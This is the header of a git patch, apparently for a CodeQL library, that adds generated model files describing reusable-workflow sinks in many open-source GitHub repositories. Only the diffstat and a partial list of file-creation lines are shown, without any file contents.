From: jorgectf Date: Thu, 11 Apr 2024 11:25:54 +0200 Subject: [PATCH 164/707] Add models for reusable workflows sinks --- .../0xpolygon_polygon-edge.model.yml | 6 ++++ .../reusable-workflows/8vim_8vim.model.yml | 9 ++++++ .../actions_reusable-workflows.model.yml | 11 +++++++ .../reusable-workflows/adap_flower.model.yml | 8 +++++ .../aio-libs_multidict.model.yml | 7 +++++ .../aio-libs_yarl.model.yml | 7 +++++ .../airbytehq_airbyte.model.yml | 6 ++++ .../alphagov_collections.model.yml | 6 ++++ .../alphagov_frontend.model.yml | 6 ++++ .../alphagov_publishing-api.model.yml | 6 ++++ .../reusable-workflows/apache_druid.model.yml | 15 ++++++++++ .../reusable-workflows/apache_flink.model.yml | 7 +++++ .../reusable-workflows/apache_spark.model.yml | 7 +++++ .../argilla-io_argilla.model.yml | 6 ++++ .../argoproj_argo-cd.model.yml | 8 +++++ .../argoproj_argo-rollouts.model.yml | 8 +++++ .../aws-amplify_amplify-ui.model.yml | 6 ++++ .../reusable-workflows/azure_apiops.model.yml | 6 ++++ .../azure_mlops-templates.model.yml | 13 +++++++++ .../bbq-beets_avocaddo-cmw.model.yml | 9 ++++++ .../bbq-beets_mobile-ci-cd.model.yml | 9 ++++++ .../bbq-beets_yujincat-action.model.yml | 7 +++++ .../bdunderscore_modular-avatar.model.yml | 6 ++++ .../benc-uk_workflow-dispatch.model.yml | 6 ++++ .../bridgecrewio_checkov.model.yml | 8 +++++ .../bugsnag_bugsnag-ruby.model.yml | 6 ++++ ...ecodealliance_wasm-micro-runtime.model.yml | 22 ++++++++++++++ .../celo-org_celo-blockchain.model.yml | 7 +++++ .../cemu-project_cemu.model.yml | 6 ++++ .../cesiumgs_cesium-unreal.model.yml | 29 +++++++++++++++++++ .../reusable-workflows/cgal_cgal.model.yml | 6 ++++ .../checkstyle_checkstyle.model.yml | 14 +++++++++ .../chia-network_actions.model.yml | 7 +++++ .../chipsalliance_chisel.model.yml | 7 +++++ .../clickhouse_clickhouse.model.yml | 14 +++++++++ .../cloudfoundry_cli.model.yml | 6 ++++ .../cocotb_cocotb.model.yml | 8 +++++ .../codeigniter4_codeigniter4.model.yml | 9 ++++++ .../com-lihaoyi_mill.model.yml | 
7 +++++ .../cosmos_ibc-go.model.yml | 17 +++++++++++ .../crowdsecurity_crowdsec.model.yml | 7 +++++ .../cryptomator_cryptomator.model.yml | 7 +++++ .../daeuniverse_dae.model.yml | 7 +++++ .../dafny-lang_dafny.model.yml | 9 ++++++ .../dagger_dagger.model.yml | 7 +++++ .../dash-industry-forum_dash.js.model.yml | 7 +++++ .../datadog_dd-trace-go.model.yml | 6 ++++ .../datadog_dd-trace-py.model.yml | 7 +++++ .../datafuselabs_databend.model.yml | 7 +++++ .../dbt-labs_dbt-bigquery.model.yml | 14 +++++++++ .../dbt-labs_dbt-core.model.yml | 9 ++++++ .../dbt-labs_dbt-snowflake.model.yml | 14 +++++++++ .../decidim_decidim.model.yml | 6 ++++ .../defectdojo_django-defectdojo.model.yml | 6 ++++ ...dependencytrack_dependency-track.model.yml | 6 ++++ .../devexpress_testcafe.model.yml | 10 +++++++ .../dfhack_dfhack.model.yml | 18 ++++++++++++ .../docker_build-push-action.model.yml | 7 +++++ .../dragonwell-project_dragonwell11.model.yml | 6 ++++ .../earthly_earthly.model.yml | 22 ++++++++++++++ .../eclipse-vertx_vert.x.model.yml | 6 ++++ .../eclipse-vertx_vertx-sql-client.model.yml | 6 ++++ .../elastic_elasticsearch-net.model.yml | 6 ++++ .../element-hq_element-desktop.model.yml | 11 +++++++ .../etcd-io_bbolt.model.yml | 7 +++++ .../reusable-workflows/etcd-io_etcd.model.yml | 9 ++++++ .../eventstore_eventstore.model.yml | 7 +++++ .../expensify_app.model.yml | 6 ++++ ...xternal-secrets_external-secrets.model.yml | 7 +++++ .../facebook_create-react-app.model.yml | 6 ++++ .../facebookresearch_xformers.model.yml | 15 ++++++++++ .../falcosecurity_falco.model.yml | 11 +++++++ .../fastify_fastify.model.yml | 6 ++++ .../ferretdb_ferretdb.model.yml | 6 ++++ .../filecoin-project_venus.model.yml | 9 ++++++ .../firebase_firebase-unity-sdk.model.yml | 19 ++++++++++++ .../flarum_framework.model.yml | 6 ++++ .../fluent_fluent-bit.model.yml | 13 +++++++++ .../flux-iac_tofu-controller.model.yml | 6 ++++ .../flyteorg_flyte.model.yml | 8 +++++ .../foundatiofx_foundatio.model.yml | 8 +++++ 
.../freecad_freecad.model.yml | 6 ++++ .../getpelican_pelican.model.yml | 8 +++++ .../getporter_porter.model.yml | 6 ++++ .../getsentry_sentry-dart.model.yml | 7 +++++ .../getsentry_sentry-unity.model.yml | 7 +++++ .../gitpod-io_gitpod.model.yml | 6 ++++ .../gittools_gitversion.model.yml | 6 ++++ ...ooglecloudplatform_magic-modules.model.yml | 6 ++++ ...loudplatform_nodejs-docs-samples.model.yml | 7 +++++ .../gravitational_teleport.model.yml | 6 ++++ .../gravitl_netmaker.model.yml | 6 ++++ .../reusable-workflows/h2oai_wave.model.yml | 8 +++++ .../hadashia_vcontainer.model.yml | 7 +++++ .../hashicorp_boundary.model.yml | 6 ++++ .../hashicorp_consul.model.yml | 7 +++++ .../hashicorp_terraform-cdk.model.yml | 15 ++++++++++ ...hashicorp_terraform-provider-tfe.model.yml | 6 ++++ .../hashicorp_terraform.model.yml | 9 ++++++ .../hashicorp_vault.model.yml | 16 ++++++++++ .../reusable-workflows/heroku_cli.model.yml | 7 +++++ .../hitobito_hitobito.model.yml | 7 +++++ .../home-assistant_operating-system.model.yml | 7 +++++ .../homuler_mediapipeunityplugin.model.yml | 11 +++++++ .../huggingface_doc-builder.model.yml | 14 +++++++++ .../huggingface_transformers.model.yml | 7 +++++ .../hyperion-project_hyperion.ng.model.yml | 8 +++++ .../reusable-workflows/ibm_sarama.model.yml | 6 ++++ ...nloader_icloud_photos_downloader.model.yml | 6 ++++ .../immich-app_immich.model.yml | 6 ++++ .../reusable-workflows/inria_spoon.model.yml | 6 ++++ ...el-device-plugins-for-kubernetes.model.yml | 6 ++++ .../inverse-inc_packetfence.model.yml | 6 ++++ .../reusable-workflows/ispc_ispc.model.yml | 6 ++++ ..._intellij-platform-gradle-plugin.model.yml | 6 ++++ .../jupyter_docker-stacks.model.yml | 13 +++++++++ .../kairos-io_kairos.model.yml | 23 +++++++++++++++ .../kanidm_kanidm.model.yml | 6 ++++ .../kata-containers_kata-containers.model.yml | 20 +++++++++++++ .../reusable-workflows/kiali_kiali.model.yml | 16 ++++++++++ .../kotest_kotest.model.yml | 6 ++++ .../kubernetes_ingress-nginx.model.yml | 7 
+++++ .../kubescape_kubescape.model.yml | 9 ++++++ .../kubeshop_botkube.model.yml | 7 +++++ .../reusable-workflows/kumahq_kuma.model.yml | 9 ++++++ .../labring_sealos.model.yml | 15 ++++++++++ .../laion-ai_open-assistant.model.yml | 6 ++++ .../learningequality_kolibri.model.yml | 9 ++++++ .../lensesio_stream-reactor.model.yml | 6 ++++ .../leptos-rs_leptos.model.yml | 8 +++++ .../lightning-ai_pytorch-lightning.model.yml | 7 +++++ .../liquibase_liquibase.model.yml | 6 ++++ .../litestar-org_litestar.model.yml | 7 +++++ .../reusable-workflows/llvm_circt.model.yml | 13 +++++++++ .../lnbits_lnbits.model.yml | 6 ++++ .../lutris_lutris.model.yml | 6 ++++ .../reusable-workflows/mailu_mailu.model.yml | 8 +++++ .../mamba-org_mamba.model.yml | 7 +++++ ...anticoresoftware_manticoresearch.model.yml | 14 +++++++++ .../marcelotduarte_cx_freeze.model.yml | 6 ++++ ...xaml_materialdesigninxamltoolkit.model.yml | 9 ++++++ .../matter-labs_zksync-era.model.yml | 7 +++++ .../mattermost_desktop.model.yml | 6 ++++ .../mattermost_mattermost.model.yml | 10 +++++++ .../mealie-recipes_mealie.model.yml | 6 ++++ .../meshery_meshery.model.yml | 16 ++++++++++ .../meshtastic_firmware.model.yml | 10 +++++++ .../microcks_microcks.model.yml | 6 ++++ ...crosoft_applicationinsights-java.model.yml | 6 ++++ .../microsoft_chat-copilot.model.yml | 11 +++++++ .../microsoft_msquic.model.yml | 18 ++++++++++++ .../microsoft_oryx.model.yml | 6 ++++ .../microsoft_pr-metrics.model.yml | 6 ++++ ...oft_react-native-windows-samples.model.yml | 13 +++++++++ .../microsoft_vscode-cpptools.model.yml | 6 ++++ .../moby_buildkit.model.yml | 10 +++++++ .../reusable-workflows/moby_moby.model.yml | 7 +++++ .../mosaicml_composer.model.yml | 11 +++++++ .../msys2_setup-msys2.model.yml | 7 +++++ .../mudler_localai.model.yml | 7 +++++ .../mustardchef_wsabuilds.model.yml | 15 ++++++++++ .../reusable-workflows/n8n-io_n8n.model.yml | 6 ++++ .../napari_napari.model.yml | 6 ++++ .../reusable-workflows/nasa_fprime.model.yml | 9 ++++++ 
.../nautobot_nautobot.model.yml | 6 ++++ .../reusable-workflows/nektos_act.model.yml | 13 +++++++++ .../neovim_neovim.model.yml | 6 ++++ .../nethermindeth_nethermind.model.yml | 11 +++++++ .../newrelic_newrelic-dotnet-agent.model.yml | 10 +++++++ .../newrelic_newrelic-java-agent.model.yml | 7 +++++ .../newrelic_node-newrelic.model.yml | 9 ++++++ .../nexus-mods_nexusmods.app.model.yml | 9 ++++++ .../nginxinc_kubernetes-ingress.model.yml | 16 ++++++++++ .../nocodb_nocodb.model.yml | 7 +++++ .../reusable-workflows/novuhq_novu.model.yml | 20 +++++++++++++ .../npm_abbrev-js.model.yml | 6 ++++ .../reusable-workflows/npm_cli.model.yml | 7 +++++ .../npm_fs-minipass.model.yml | 6 ++++ .../npm_hosted-git-info.model.yml | 6 ++++ .../reusable-workflows/npm_ini.model.yml | 6 ++++ ...pm_json-parse-even-better-errors.model.yml | 6 ++++ .../npm_minify-registry-metadata.model.yml | 6 ++++ .../npm_mute-stream.model.yml | 6 ++++ .../npm_node-semver.model.yml | 6 ++++ .../npm_node-which.model.yml | 6 ++++ .../reusable-workflows/npm_nopt.model.yml | 6 ++++ .../npm_normalize-package-data.model.yml | 6 ++++ .../npm_write-file-atomic.model.yml | 6 ++++ .../onflow_cadence.model.yml | 9 ++++++ .../open-goal_jak-project.model.yml | 11 +++++++ ...pen-telemetry_opentelemetry-demo.model.yml | 6 ++++ ...try_opentelemetry-dotnet-contrib.model.yml | 7 +++++ ...n-telemetry_opentelemetry-dotnet.model.yml | 7 +++++ ...entelemetry-java-instrumentation.model.yml | 7 +++++ ...lemetry_opentelemetry-js-contrib.model.yml | 6 ++++ ...telemetry_opentelemetry-operator.model.yml | 8 +++++ .../openbao_openbao.model.yml | 11 +++++++ .../openhab_openhab-docs.model.yml | 9 ++++++ .../openmined_pysyft.model.yml | 7 +++++ .../opentofu_opentofu.model.yml | 9 ++++++ .../openttd_openttd.model.yml | 17 +++++++++++ .../openvinotoolkit_openvino.model.yml | 6 ++++ .../reusable-workflows/openxla_iree.model.yml | 12 ++++++++ .../reusable-workflows/openzfs_zfs.model.yml | 6 ++++ ...ator-framework_java-operator-sdk.model.yml | 
8 +++++ .../orange-opensource_hurl.model.yml | 6 ++++ ...aolosalvatori_servicebusexplorer.model.yml | 7 +++++ .../parcel-bundler_parcel.model.yml | 6 ++++ .../pardeike_harmony.model.yml | 6 ++++ .../reusable-workflows/pcsx2_pcsx2.model.yml | 12 ++++++++ .../pennylaneai_pennylane.model.yml | 8 +++++ ...necone-io_pinecone-python-client.model.yml | 6 ++++ .../pixie-io_pixie.model.yml | 8 +++++ .../plantuml_plantuml.model.yml | 6 ++++ .../powerdns_pdns.model.yml | 8 +++++ .../preactjs_preact.model.yml | 7 +++++ .../prismlauncher_prismlauncher.model.yml | 6 ++++ .../product-os_flowzone.model.yml | 6 ++++ .../project-oak_oak.model.yml | 7 +++++ .../reusable-workflows/prql_prql.model.yml | 6 ++++ .../pulumi_pulumi.model.yml | 10 +++++++ .../puppetlabs_puppetlabs-puppetdb.model.yml | 8 +++++ .../reusable-workflows/pyo3_maturin.model.yml | 6 ++++ .../reusable-workflows/pyo3_pyo3.model.yml | 6 ++++ .../python_cpython.model.yml | 7 +++++ .../pytorch_botorch.model.yml | 6 ++++ .../reusable-workflows/pytorch_xla.model.yml | 6 ++++ .../quarto-dev_quarto-cli.model.yml | 6 ++++ .../rancher_dashboard.model.yml | 9 ++++++ .../rasterio_rasterio.model.yml | 6 ++++ .../redisearch_redisearch.model.yml | 6 ++++ .../remix-run_remix.model.yml | 6 ++++ .../rmcrackan_libation.model.yml | 9 ++++++ .../rocketchat_rocket.chat.model.yml | 6 ++++ .../ruby_ruby.wasm.model.yml | 6 ++++ .../rustdesk_rustdesk.model.yml | 8 +++++ .../saadeghi_daisyui.model.yml | 7 +++++ .../sagemath_sage.model.yml | 12 ++++++++ .../schemastore_schemastore.model.yml | 7 +++++ .../scikit-learn_scikit-learn.model.yml | 6 ++++ .../seleniumhq_selenium.model.yml | 7 +++++ .../shaka-project_shaka-packager.model.yml | 8 +++++ .../shaka-project_shaka-player.model.yml | 9 ++++++ .../shimataro_ssh-key-action.model.yml | 6 ++++ .../softfever_orcaslicer.model.yml | 7 +++++ ...-mansion_react-native-reanimated.model.yml | 6 ++++ .../solana-labs_solana.model.yml | 6 ++++ .../sonarr_sonarr.model.yml | 7 +++++ 
.../speedb-io_speedb.model.yml | 7 +++++ ...ring-cloud_spring-cloud-dataflow.model.yml | 6 ++++ .../sqlfluff_sqlfluff.model.yml | 8 +++++ .../stdlib-js_stdlib.model.yml | 9 ++++++ .../stereokit_stereokit.model.yml | 10 +++++++ .../streetsidesoftware_cspell.model.yml | 6 ++++ .../supabase_auth.model.yml | 6 ++++ .../reusable-workflows/supabase_cli.model.yml | 6 ++++ .../tencent_hippy.model.yml | 9 ++++++ .../tgstation_tgstation.model.yml | 8 +++++ .../thesofproject_sof.model.yml | 6 ++++ .../tiann_kernelsu.model.yml | 8 +++++ .../tiledb-inc_tiledb.model.yml | 7 +++++ .../toeverything_affine.model.yml | 6 ++++ .../tracel-ai_burn.model.yml | 6 ++++ .../tribler_tribler.model.yml | 6 ++++ .../ubisoft_sharpmake.model.yml | 7 +++++ .../unity-technologies_ml-agents.model.yml | 6 ++++ .../reusable-workflows/urbit_urbit.model.yml | 7 +++++ .../uyuni-project_uyuni.model.yml | 7 +++++ .../vert-x3_vertx-hazelcast.model.yml | 7 +++++ .../reusable-workflows/vkcom_vkui.model.yml | 6 ++++ .../walletconnect_web3modal.model.yml | 6 ++++ .../warzone2100_warzone2100.model.yml | 6 ++++ .../wasmedge_wasmedge.model.yml | 10 +++++++ .../web-infra-dev_rspack.model.yml | 7 +++++ .../reusable-workflows/werf_werf.model.yml | 21 ++++++++++++++ .../widdix_aws-cf-templates.model.yml | 6 ++++ .../wildfly_wildfly.model.yml | 9 ++++++ .../yt-dlp_yt-dlp.model.yml | 11 +++++++ .../zenml-io_zenml.model.yml | 8 +++++ .../zephyrproject-rtos_zephyr.model.yml | 6 ++++ .../zitadel_zitadel.model.yml | 9 ++++++ 281 files changed, 2322 insertions(+) create mode 100644 ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml 
create mode 100644 ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml create 
mode 100644 ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml create mode 100644 